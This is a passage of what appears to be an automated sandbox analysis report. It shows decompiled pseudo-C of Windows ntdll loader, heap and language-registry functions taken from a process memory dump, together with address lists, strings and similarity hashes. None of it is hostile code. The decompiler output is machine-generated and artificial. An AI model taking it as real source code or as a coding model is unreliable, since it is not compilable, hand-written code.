																	E01C09D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E01B4FFB0(_t118, _t156, 0x1c286cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01B79A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01b48799
0x01b4879d
0x01b487a1
0x01b487a3
0x01b487a8
0x01b487c3
0x01b487c3
0x01b487c8
0x01b487d1
0x01b487d4
0x01b487d8
0x01b487e5
0x01b487ec
0x01b99bfe
0x01b99c00
0x01b99c02
0x01b99c08
0x01b99c0d
0x01b99c0f
0x01b99c14
0x01b99c2d
0x01b99c32
0x01b99c37
0x01b99c3a
0x01b99c3c
0x01b99c42
0x01b99c42
0x01b99c3c
0x01b99c02
0x01b487da
0x01b487df
0x01b487e3
0x00000000
0x00000000
0x01b487e3
0x01b487f2
0x00000000
0x01b487fb
0x01b487fd
0x01b487fe
0x01b4880e
0x01b4880f
0x01b48810
0x01b48814
0x01b4881a
0x01b4881c
0x01b4881f
0x01b48821
0x01b48822
0x01b48824
0x01b48826
0x01b4882c
0x01b4882e
0x01b99c48
0x01b99c48
0x01b48834
0x01b48834
0x01b48837
0x00000000
0x00000000
0x01b48837
0x01b4882e
0x01b4883d
0x01b48840
0x01b48843
0x01b48846
0x01b48849
0x01b4884c
0x01b4884e
0x01b48850
0x01b48852
0x01b48854
0x01b48857
0x01b488b4
0x01b488b6
0x01b488b6
0x01b48859
0x01b48859
0x01b48859
0x01b48861
0x01b48866
0x01b4886a
0x01b4893d
0x01b48941
0x00000000
0x01b48947
0x01b48947
0x01b4894a
0x01b4894c
0x00000000
0x01b48952
0x01b48955
0x01b4895a
0x01b4895d
0x01b4895d
0x01b4895f
0x01b48961
0x01b48961
0x01b48968
0x00000000
0x00000000
0x01b4896a
0x01b4896b
0x01b4896e
0x00000000
0x01b48970
0x01b48970
0x01b48970
0x01b48970
0x01b48972
0x01b48972
0x01b48974
0x00000000
0x01b4897a
0x01b4897a
0x01b4897d
0x00000000
0x01b48983
0x01b99c65
0x01b99c6d
0x01b99c72
0x01b99c75
0x01b99c75
0x01b99c82
0x01b99c86
0x01b99c87
0x01b99c88
0x01b99c89
0x01b99c8c
0x01b99c90
0x01b99c95
0x01b99c97
0x01b99ca0
0x01b99ca3
0x01b99ca9
0x01b99ca9
0x00000000
0x01b99ca9
0x01b99ca3
0x00000000
0x01b99c97
0x01b4897d
0x00000000
0x01b48974
0x01b48988
0x01b48992
0x01b48996
0x00000000
0x01b48996
0x01b4894c
0x00000000
0x01b48870
0x01b4887b
0x01b4887d
0x01b4887f
0x01b48881
0x01b48884
0x01b48884
0x01b48886
0x01b48889
0x01b4888c
0x01b4888e
0x01b48891
0x01b48891
0x01b48898
0x00000000
0x00000000
0x01b4889a
0x01b4889b
0x01b4889e
0x00000000
0x00000000
0x01b488a0
0x01b488a8
0x01b488b0
0x01b488b2
0x01b488d3
0x01b488d5
0x00000000
0x01b488d7
0x01b488db
0x01b488dc
0x01b488e0
0x01b488e8
0x01b488ee
0x01b488f0
0x01b488f3
0x01b488fc
0x01b48901
0x01b48906
0x01b4890c
0x01b4890c
0x01b4890f
0x01b48916
0x01b48917
0x01b48918
0x01b48919
0x01b4891a
0x01b4891f
0x01b48921
0x01b99c52
0x01b99c55
0x01b99c5b
0x01b99cac
0x01b99cc0
0x01b99cc0
0x01b99c55
0x01b48927
0x01b48927
0x01b4892f
0x01b48933
0x00000000
0x01b488f5
0x01b488f5
0x00000000
0x01b488f7
0x01b488f7
0x01b488fa
0x00000000
0x00000000
0x00000000
0x00000000
0x01b488fa
0x01b488f5
0x01b488f3
0x00000000
0x01b488d5
0x00000000
0x01b488b2
0x01b488c9
0x00000000
0x01b488c9
0x01b4887f
0x01b4886a
0x01b48857
0x01b48852
0x01b488bf
0x01b488bf
0x01b487aa
0x01b487ad
0x01b487ae
0x01b487b4
0x01b487b5
0x01b487b6
0x01b487b8
0x01b487bd
0x01b487c1
0x01b487f4
0x01b487fa
0x00000000
0x00000000
0x00000000
0x01b487c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01B99C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01B99C18
LdrpDoPostSnapWork, xrefs: 01B99C1E

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: a8da0d9a0844e9716b3bb1c89b7ee149e096fc934d057c1aed3a1ef63f012eef
Instruction ID: 431c9e02594340d396da4e693fc647012bf80287b22f9b0dc7eaa5c1e0b630e3
Opcode Fuzzy Hash: a8da0d9a0844e9716b3bb1c89b7ee149e096fc934d057c1aed3a1ef63f012eef
Instruction Fuzzy Hash: F0911131A00216DFEF2CDF99D880ABAB7B5FF54314B0481E9EA05AB251E730E901DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01B5B73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E01B5B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E01BFA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1c28748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E01B3B150();
					} else {
						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E01B3B150();
					__eflags =  *0x1c27bc8;
					if(__eflags == 0) {
						E01BF2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E01BFA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x1c28720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x1c28720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E01B5B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E01BFA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E01B5E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x01b5b746
0x01b5b74b
0x01b5b74d
0x01b5b750
0x01b5b755
0x01b5b758
0x01b5b758
0x01b5b75e
0x01b5b763
0x01b5b764
0x01b5b76a
0x01b5b76d
0x01b5b771
0x01b5b776
0x01b5b85c
0x01b5b85d
0x01b5b860
0x01b5b865
0x01ba2ba1
0x01ba2ba2
0x01ba2ba9
0x01ba2bae
0x01ba2bae
0x01b5b77c
0x01b5b77c
0x01b5b77c
0x01b5b785
0x01b5b788
0x01ba2bb6
0x01ba2bb9
0x00000000
0x00000000
0x01ba2bbf
0x01ba2bc5
0x01ba2bc9
0x01ba2be8
0x01ba2bed
0x01ba2bcb
0x01ba2be0
0x01ba2be5
0x01ba2bf3
0x01ba2bf8
0x01ba2bfd
0x01ba2c05
0x01ba2c0e
0x01ba2c0e
0x00000000
0x01b5b78e
0x01b5b78e
0x01b5b78e
0x01b5b791
0x01b5b791
0x01b5b797
0x01b5b797
0x01b5b79f
0x01b5b7a9
0x01b5b7af
0x01b5b7af
0x01b5b7b1
0x01b5b7b6
0x01b5b7e2
0x01b5b7e2
0x01b5b7e7
0x01b5b880
0x01b5b7ed
0x01b5b7ed
0x01b5b7ed
0x01b5b7ef
0x01b5b7f2
0x01b5b7f2
0x01b5b7f5
0x01b5b7fa
0x01ba2c2d
0x01ba2c2e
0x01ba2c39
0x01b5b800
0x01b5b800
0x01b5b802
0x01b5b805
0x01b5b808
0x01b5b808
0x01b5b80a
0x01b5b80d
0x01b5b816
0x01b5b81c
0x01b5b822
0x01b5b82f
0x01b5b88b
0x01b5b892
0x01b5b897
0x01b5b899
0x01b5b89b
0x01b5b89e
0x01b5b8a5
0x01b5b8a8
0x01b5b8aa
0x01b5b8ac
0x01b5b8ac
0x01b5b8aa
0x01b5b892
0x01b5b831
0x01b5b839
0x01b5b83b
0x01b5b83b
0x01b5b844
0x01b5b84b
0x01b5b852
0x01b5b7b8
0x01b5b7ba
0x01b5b7bf
0x01b5b7c4
0x01ba2c18
0x01ba2c19
0x01ba2c23
0x01b5b7ca
0x01b5b7ca
0x01b5b7cc
0x01b5b7cf
0x01b5b7d1
0x01b5b7d1
0x01b5b7d4
0x01b5b7dc
0x01b5b8bb
0x01b5b8bb
0x01b5b8be
0x01b5b8be
0x01b5b8c1
0x00000000
0x00000000
0x01b5b8c3
0x01b5b8c5
0x01b5b8c7
0x01b5b8e0
0x00000000
0x01b5b8e0
0x01b5b8cc
0x01b5b8cc
0x00000000
0x01b5b8cc
0x01b5b8d6
0x01b5b8d6
0x00000000
0x01b5b7dc
0x01b5b7b6

Strings

HEAP[%wZ]: , xrefs: 01BA2BDB
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01BA2BF3
HEAP: , xrefs: 01BA2BE8

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: c26d6455c1e674d80ea32b7f17d6ad6fc5f4be3a6aa2bfc9fc6ae304b0c85fcd
Instruction ID: 8e9648cfdebd8b5866650a516168090765a07d267543084188597380c1c28c27
Opcode Fuzzy Hash: c26d6455c1e674d80ea32b7f17d6ad6fc5f4be3a6aa2bfc9fc6ae304b0c85fcd
Instruction Fuzzy Hash: E261C071600201DFDB6DDF28C681B6ABBE2FF44304F5885EEE84A8B255D770E891CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01B47E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01B47E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E01B4CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E01B3C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1c25780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01BB5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1c25780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01B57D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01B57D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01BB7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01B57D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01B57D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01BB7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E01B6A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E01B3B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01b47e4c
0x01b47e50
0x01b47e55
0x01b47e58
0x01b47e5d
0x01b47e71
0x01b47f33
0x01b47e77
0x01b47e77
0x01b47e79
0x01b47e79
0x01b47e7e
0x01b47f45
0x01b99848
0x00000000
0x01b99848
0x01b47f4e
0x01b47f53
0x01b47f5a
0x00000000
0x00000000
0x01b9985a
0x01b99862
0x01b99866
0x00000000
0x01b9986c
0x00000000
0x01b9986c
0x01b47e84
0x01b47e84
0x01b47e8d
0x01b99871
0x01b47eb8
0x01b47ec0
0x01b47ec0
0x01b47e9a
0x01b9987e
0x00000000
0x00000000
0x01b99884
0x01b9988b
0x01b998a7
0x01b998ac
0x01b998b1
0x01b998b6
0x01b998b8
0x01b998b8
0x01b998b9
0x00000000
0x01b998b9
0x01b47ea0
0x01b47ea7
0x00000000
0x00000000
0x01b47eac
0x01b47eb1
0x01b47ec6
0x01b47ed0
0x01b998cc
0x01b47ed6
0x01b47ed6
0x01b47ed6
0x01b47ede
0x01b47ee3
0x01b998e3
0x01b998f0
0x01b99902
0x01b998f2
0x01b998fb
0x01b998fb
0x01b99907
0x01b9991d
0x01b9991d
0x01b99907
0x01b998e3
0x01b47ef0
0x01b47f14
0x01b47f14
0x01b47f1e
0x01b99946
0x01b47f24
0x01b47f24
0x01b47f24
0x01b47f2c
0x01b9996a
0x01b99975
0x01b99975
0x01b9997e
0x01b99993
0x01b99993
0x01b9997e
0x00000000
0x01b47ef2
0x01b47efc
0x01b47f0a
0x01b47f0e
0x01b99933
0x00000000
0x01b99933
0x00000000
0x01b47f0e
0x00000000
0x00000000
0x00000000
0x01b47eb1

Strings

LdrpCompleteMapModule, xrefs: 01B99898
minkernel\ntdll\ldrmap.c, xrefs: 01B998A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01B99891

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: a60a4fa2caf2f99f0197b3e45991ecf47950fc5b1dfb3f2ceaba9d57835ae5f9
Instruction ID: 7fe8da9113321e704598da02bcc560ca650af5d0cd623f69060371719b94386f
Opcode Fuzzy Hash: a60a4fa2caf2f99f0197b3e45991ecf47950fc5b1dfb3f2ceaba9d57835ae5f9
Instruction Fuzzy Hash: 4A51F131640742DBEB3ACB6CC984B6A7BA8EB00714F4447E9E9519B7E1DB30ED01D791

Uniqueness

Uniqueness Score: -1.00%

Function 01B3E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01B3E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E01B3F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E01B795D0();
						}
						if(_t78 != 0) {
							L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E01B7FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E01B7BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01B79600();
					if(_t97 < 0) {
						goto L6;
					}
					E01B7BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L01B3F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E01B7BB40(_t83, _t102 + 0x24, _t78);
								if(L01B443C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E01B7BB40(_t84, _t102 + 0x24, _t94);
									if(L01B443C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x01b3e620
0x01b3e628
0x01b3e62f
0x01b3e631
0x01b3e635
0x01b3e637
0x01b3e63e
0x01b95503
0x01b95503
0x01b3e64c
0x01b3e64c
0x01b3e651
0x00000000
0x00000000
0x01b3e661
0x01b3e665
0x01b9542a
0x01b3e715
0x01b3e71a
0x01b3e71c
0x01b3e720
0x01b3e720
0x01b3e727
0x01b3e736
0x01b3e736
0x01b3e743
0x01b3e743
0x01b3e673
0x01b3e678
0x01b3e67d
0x01b3e682
0x01b3e685
0x01b3e692
0x01b3e69b
0x01b3e6a3
0x01b3e6ad
0x01b3e6b1
0x01b3e6b2
0x01b3e6bb
0x01b3e6bf
0x01b3e6c0
0x01b3e6c8
0x01b3e6cc
0x01b3e6d5
0x01b3e6d9
0x00000000
0x00000000
0x01b3e6e5
0x01b3e6ea
0x01b3e6f9
0x01b3e70b
0x01b3e70f
0x01b95439
0x01b9545e
0x01b9545e
0x00000000
0x01b9545e
0x01b9543b
0x01b9543e
0x01b95440
0x01b95445
0x01b95472
0x01b95475
0x01b9548d
0x01b95493
0x01b954a9
0x00000000
0x00000000
0x01b954ab
0x01b954b4
0x01b954bc
0x01b954c8
0x01b954de
0x01b954fb
0x01b954e0
0x01b954e6
0x01b954eb
0x01b954eb
0x01b954de
0x00000000
0x01b954bc
0x01b95477
0x01b9547a
0x01b95480
0x01b95483
0x01b95486
0x01b9548b
0x00000000
0x00000000
0x00000000
0x01b9548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01b95447
0x01b95447
0x01b95447
0x01b95447
0x01b9544e
0x00000000
0x00000000
0x01b95450
0x01b95452
0x01b95455
0x01b9545a
0x00000000
0x00000000
0x00000000
0x01b9545c
0x01b9546a
0x01b9546d
0x01b9546f
0x00000000
0x01b9546f
0x01b3e70f

Strings

InstallLanguageFallback, xrefs: 01B3E6DB
@, xrefs: 01B3E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01B3E68C

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: b3ed41347be55d7d2c4e77577d89c6d4849451b84ae7ebd4af196630d162d2a0
Instruction ID: 32dff74b6c9c9356eecc25e333bec1679344e35df6466bbdfe825570f8944c11
Opcode Fuzzy Hash: b3ed41347be55d7d2c4e77577d89c6d4849451b84ae7ebd4af196630d162d2a0
Instruction Fuzzy Hash: 9551A0726043469BDF2ADF28C480A6BB7E8EF88654F4509BEF985D7340E734D905C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01B5B8E4, Relevance: 3.8, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01B5B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1c28748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E01B3B150();
						} else {
							E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E01B3B150();
						__eflags =  *0x1c27bc8;
						if(__eflags == 0) {
							E01BF2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
